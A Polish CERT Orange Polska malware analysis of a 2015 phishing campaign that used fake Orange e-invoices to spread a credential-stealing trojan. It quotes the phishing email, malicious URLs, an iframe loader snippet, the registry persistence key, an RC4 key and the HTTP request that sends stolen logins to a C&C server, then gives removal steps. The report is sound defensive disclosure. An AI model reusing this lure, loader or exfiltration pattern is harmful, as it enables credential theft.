Warszawa, dnia 5.10.2015 Analiza kampanii złośliwego Oprogramowania efaktura Orange Win32/Injector.Autoit.BKD / Trojan.VBInject CERT OPL Analiza Malware Autor: Iwo Graj Strona 1 z 20
Spis Treści. 1. Wstęp...3 2. Analiza Statyczna...7 4. Rekomendacje...21 CERT OPL Analiza Malware Autor: Iwo Graj Strona 2 z 20
Kampania szkodliwego oprogramowania Win32/Injector.Autoit.BKD / Win32/PSW.VB.NIS 1. Wstęp. Znaczna liczba polskich internautów w tym klienci Orange Polska otrzymała w piątek 2 października 2015 na swoje skrzynki e-mail dziwnie wyglądające wiadomości, sugerujące, iż mają do czynienia z zaległą fakturę Orange. Wiadomość wyglądała następująco: Witamy, Przypominamy, ze uplynal termin platnosci e-faktury za uslugi stacjonarne Orange. Zaleglosci z tytulu nieuregulowanych oplat dotycza: Numer faktury FWL9059917000115 Numer ewidencyjny Klienta 541 290 5991 7053 Kwota do zaplaty 107,15 PLN Termin platnosci 2015-08-20 Szczególowe rozliczenie kwoty do zaplaty faktury jest dostepne pod linkiem. Wygodnie i zawsze w terminie e-fakture mozna oplacic korzystajac z Polecenia Zaplaty lub Platnosci Elektronicznej. Jezeli faktura zostala juz oplacona prosimy o uznanie tej wiadomosci za nieaktualna. Wiadomosc zostala wygenerowana automatycznie, prosimy na nia nie odpowiadac. Pozdrawiamy Orange Pod linkiem w wiadomości znajdowały się dwa różne adresy internetowe stron www: http://orange.dokumenty.co.vu/wyswietl-fakture/fwl90599170-001-15.pdf http://dokumenty.orange-24.pl/view-online/i.html?wyswietl-fakture=fwl90599170/001/15.pdf CERT OPL Analiza Malware Autor: Iwo Graj Strona 3 z 20
Wieczorem 2 października została założona kolejna domena na którą został przekierowany ruch z adresu http://orange.dokumenty.co.vu/ na http://dokumenty-orange.5v.pl Po kliknięciu w link, otwierała się kolejna witryna, na której znajdował się animowany plik gif imitujący otwierający się w przeglądarce internetowej dokument Adobe Reader. Następnie użytkownikowi wyświetlał się plik do pobrania o nazwie FWL9059917000115.scr CERT OPL Analiza Malware Autor: Iwo Graj Strona 4 z 20
Poniżej plik z rozszerzeniem.gif, który wyświetlał się użytkownikowi. Pobierany plik był rozpoznawalny przez 32 na 56 silników antywirusowych. Świadczy to o tym, że autorzy tej kampanii wykorzystali gotowy skrypt, który w prawie niezmienionej postaci został wykorzystany w kampanii. Nie zostały użyte zaawansowane techniki zaciemniania kodu, triki utrudniające analizę, czy też protektory, wykrywające maszyny wirtualne. CERT OPL Analiza Malware Autor: Iwo Graj Strona 5 z 20
Oto kod źródłowy strony, która wyświetlała się użytkownikowi: Jak widać w powyższym kodzie, na stronie umieszczona była ramka importująca zawartość z docelowej strony http://wrzos.net/pl1/index.html, skąd pobierany był kod: <div id="iframe_cont"> <iframe style="position:absolute; top:0px; left:0px;z-index:1;" src="http://wrzos.net/pl1/index.html" width="100%" height="100%" frameborder="0" scrolling="auto" id="frame_c"></iframe> </div> <noframes> <div style="text-align: center;"> <b>witamy. System wykrył, że twoja przeglądarka nie obsługuje ramek.</b><br /> <h1> <a href="http://wrzos.net/pl1/index.html"></a></h1> <p>darmowe aliasy <a href="http://5v.pl">5v.pl</a> </p></div> </noframes> Na docelowej stronie znajdował się prosty skrypt JavaScript, który rozpoczynał pobieranie ze strony http://wrzos.net/pl1/index.html" CERT OPL Analiza Malware Autor: Iwo Graj Strona 6 z 20
2. Analiza kodu Zdebugowanie pliku o nazwie FWL9059917000115.scr pozwoliło na dalszą analizę złośliwego kodu. Podczas analizy zostały przedstawione fragmenty, które kluczowo odpowiadają za infekowanie systemu użytkownika oraz jego złośliwe działanie. Po zdekompilowaniu sekcji kodu można zobaczyć zastosowane triki, których zadaniem jest utrudnienie czytania kodu: Po oczyszczeniu kodu z zakodowanych znaków CharCode'u kod wyglądał zdecydowanie bardziej przejrzyście: Jak widać po pierwszych liniach kodu, skrypt tworzył w lokalizacjach @TempDir oraz @AppData użytkownika systemu dwa pliki: xd oraz plik wykonywalny o losowej nazwie wygenerowanej przez użytą funkcję Random. CERT OPL Analiza Malware Autor: Iwo Graj Strona 7 z 20
Lokalizacja plików w systemie Windows po infekcji: Plik o wygenerowanej losowo nazwie 34162.exe Zawartość tego pliku była kopią zawartości pliku pobieranego ze strony utworzonej przez spamerów. Funkcjonowanie tego skryptu miało zapewnić uruchamianie się docelowego pliku z wirusem przy każdym starcie systemu użytkownika. Był on generowany za pomocą pliku 34162.exe, posiadającego funkcję samorozpakowania. W pierwszej kolejności sprawdzał on, czy plik xd z docelowym wirusem istnieje już w systemie w danej lokalizacji. Jeśli nie, tworzył go ponownie, a następnie uruchamiał. Tego typu pętla miała zapewnić ciągłość infekcji komputera użytkownika. CERT OPL Analiza Malware Autor: Iwo Graj Strona 8 z 20
Wygenerowany plik z działającym wirusem znajdował się w następującej lokalizacji systemu Windows: Ciekawym pomysłem było również zastosowanie w kodzie triku z wykorzystaniem ADS (Alternate Data Streams). Jest to jedna ze standardowych właściwości systemu plików NTFS. W wielu przypadkach jest ona wykorzystywana przez twórców złośliwego oprogramowania do ukrywania danych w systemach plików NTFS. To częste zachowanie różnego typu rootkitów lub innego złośliwego oprogramowania. CERT OPL Analiza Malware Autor: Iwo Graj Strona 9 z 20
Poniżej przedstawiono fragment kodu dodający ADS do generowanego pliku z wartością :Zone.Identifier:$DATA Jednocześnie po pobraniu pliku FWL9059917000115.scr ze złośliwym oprogramowaniem za pomocą polecenia dir i przełącznika /r można zobaczyć jakie wartości ma w sobie ADS. CERT OPL Analiza Malware Autor: Iwo Graj Strona 10 z 20
Kolejną złośliwą funkcją było dopisanie do rejestru systemu użytkownika wpisu i podklucza, który miał uruchamiać wirusa lub ponownie wygenerować docelowy plik xd. Zaciemniony kod wirusa dopisujący wpis do rejestru: Kod po usunięciu zakodowanych znaków CharCode: Jak widać, wirus dopisywał za pomocą funkcji RegWrite do rejestru w lokalizacji HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run podklucz o nazwie WerFault oraz lokalizację pliku wykonywalnego wraz z jego nazwą wygenerowaną dynamicznie przez funkcję Random. Efekty infekcji zostały przedstawione na poniższym zrzucie ekranu. CERT OPL Analiza Malware Autor: Iwo Graj Strona 11 z 20
Wirus zainfekował system, dopisując podklucz do rejestru, a także zapisał ścieżkę do pliku wykonywalnego o nazwie 34162.exe w celu uruchamiania go przy każdym starcie zainfekowanego systemu. Lokalizacja pliku wykonywalnego 34162.exe to w tym przypadku C:\Users\Iwo Graj\AppData\Roaming CERT OPL Analiza Malware Autor: Iwo Graj Strona 12 z 20
Kolejną ciekawą rzeczą w kodzie jest użycie algorytmu RC4, który dekoduje całą zawartość pliku o nazwie xd znajdującego się w lokalizacji C:\Users\Iwo Graj\AppData\Local\Temp\. Kod źródłowy odpowiedzialny za odczytanie i zdeszyfrowanie pliku xd przedstawiono poniżej. Jak widać, klucz za pomocą którego można zdeszyfrować plik to ATug1WeGggHWUpmY2qyjve Poniżej przedstawiono Zaciemniony kod funkcji _rc4, która określa zawartość zmiennej $de, używanej w dalszej kolejności do realizacji złośliwych funkcji. CERT OPL Analiza Malware Autor: Iwo Graj Strona 13 z 20
Kod funkcji po usunięciu zakodowanych znaków CharCode: Kolejna zaciemniona CharCode'em zdefiniowana funkcja _get_rc4_opcode: Oraz po usunięciu zaciemnienia CharCode: CERT OPL Analiza Malware Autor: Iwo Graj Strona 14 z 20
Zmienna Opcode zawiera kod assemblera, który jest następnie wykonywany. Poniższe zrzuty przedstawiają omawiany deasemblowany kod Opcode : CERT OPL Analiza Malware Autor: Iwo Graj Strona 15 z 20
CERT OPL Analiza Malware Autor: Iwo Graj Strona 16 z 20
Poniżej przedstawiono pozostały zbiór zdefiniowanych przez autora funkcji użytych w kodzie. CERT OPL Analiza Malware Autor: Iwo Graj Strona 17 z 20
Po zdekodowaniu pliku xd za pomocą klucza RC4 znajdującego się w pliku z fakturą, przeprowadzono analizę wykonywalnego pliku binarnego, odpowiedzialnego za złośliwe funkcje - wykradanie loginów i haseł z przeglądarek internetowych. Na poniższym zrzucie ekranu przedstawiono program zatrzymany w momencie wysyłania skradzionych danych do serwera C&C. CERT OPL Analiza Malware Autor: Iwo Graj Strona 18 z 20
Na potrzeby analizy został utworzony użytkownik i hasło oraz konto pocztowe. Przekazywanie wykradzionych danych przez malware z zainfekowanego komputera na serwer, wykonywane jest za pomocą następujących żądań HTTP: http://update-microsoft.pl/wpconfig/isr/api/index.php?action=add&username=marcin.kozlowski007@o2.pl&password=&app=i E%207-9&pcname=CERT-ORANGE&sitename=http://poczta.o2.pl/ CERT OPL Analiza Malware Autor: Iwo Graj Strona 19 z 20
3. Rekomendacje Jak usunąć tego wirusa? - uruchom system w trybie awaryjnym w menu start w oknie Wyszukaj programy i pliki wpisz Regedit i uruchom znaleziony plik regedit.exe - naciśnij Ctrl-F, w oknie wyszukiwania wpisz WerFault podklucz znajduje się w lokalizacji HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run po czym usuń znaleziony podklucz w nazwie WerFault odwołujący się do lokalizacji pliku wykonywalnego C:\[Nazwa_użytkownika]\AppData\Roaming\[nazwa_pliku.exe] - następnie otwórz lokalizację C:\Użytkownicy\[Nazwa_użytkownika]\AppData\Roaming\, odszukaj plik wykonywalny ****.exe występujący w podkluczu i usuń go - następnie otwórz lokalizację C:\Użytkownicy\[Nazwa_użutkownika]\AppData\Local\Temp\ odszukaj plik o nazwie xd i usuń go. Zalecamy również stosowanie oprogramowania antywirusowego, które może przyczynić się do uniknięcia kolejnych infekcji rożnego rodzaju złośliwym oprogramowaniem. CERT OPL Analiza Malware Autor: Iwo Graj Strona 20 z 20